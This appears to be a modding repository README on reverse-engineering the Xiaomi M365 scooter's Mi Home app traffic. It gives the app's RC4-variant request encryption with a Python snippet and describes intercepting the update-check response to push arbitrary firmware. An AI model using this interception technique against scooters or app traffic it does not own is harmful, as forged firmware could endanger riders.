Unleash the m365

This repository contains multiple files regarding the investigation about the Xiaomi Mijia M365 Scooter.

Table of Contents

• Unleash the m365
  • Research
    • Mi Home
      • Android
        • APP <--> Server Communication
      • IOS
  • Downgrade
  • Firmware Mods
  • Hardware Mods
  • Files Index
  • License
  • Acknowledgments

Research

This section contains information regarding the research about things like the official apps or the Bluetooth communication protocol.

Mi Home

Android

APP Server Communication

All the requests performed by the app to the servers regarding with the scooter (Check updates etc) are ciphered using RC4, in the case of the latest android version all the parameters used to create the key are sent on every request.

data=zqnK2TlkGDq6iZToITYyt9CAEtoWht4LEh88XRnU&rc4_hash__=u8lit+iwOqc0P1k+VsRSlZ72POBvp701tEWFSg==&signature=A/l2lbo3OOdt/VoyEyLECfI/6BY=&_nonce=pFBJTd2vcbUBgaHP&ssecurity=Tw+X976Vymge9yBtgZPeMQ==

The paremeters used to create the key are "ssecurity" and "_nonce" in the following way. B64Encode(Sha256(concat(B64Decode(ssecurity), B64Decode(_nonce))))

Then this key is B64Decoded and used in a common RC4 algorithm but with 1024 'fake rounds', the following snippet shows a python implementation of this RC4 algorithm.

#b64decoded data and key
def rc4mi(data, key):
    S, j, out = list(range(256)), 0, []

    for i in range(256):
        j = (j + ord(key[i % len(key)]) + S[i]) % 256
        S[i], S[j] = S[j], S[i]

    # 1024 fake rounds
    i = j = 0
    for x in range(1024):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]

    for ch in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(ch) ^ S[(S[i] + S[j]) % 256]))

IOS

Downgrade

When the app check for upgrades it performs a requests to the xiaomi servers, more exactly to the following endpoint "/app/home/latest_version" sending the following content (It change a little bit from android to IOS but its not important).

{"model":"ninebot.scooter.v1"}

Then the server response the following data, to perform the update its as easy as intercept the response from the server, fill all the parameters and cipher the message with the correct sscurity and the nonce of the request.

{"code":0,"message":"ok","result":{"version":"","url":"","changeLog":"","md5":""}}

• Code: 0
• message: ok
• result
  • version: anything you want Example 1.0.1_237
  • url: Url to a zip file containing the firmware
  • changeLog: anything you want
  • md5: md5 hash of the zip file

Firmware Mods

Hardware Mods

Files Index

License

This project is licensed under the MIT License - see the LICENSE.md file for details

Acknowledgments

• Hector Cuesta H3ku
• Jesus Anton Patatas Fritas
• Borja Martinez Borjmz
• Jaime Martin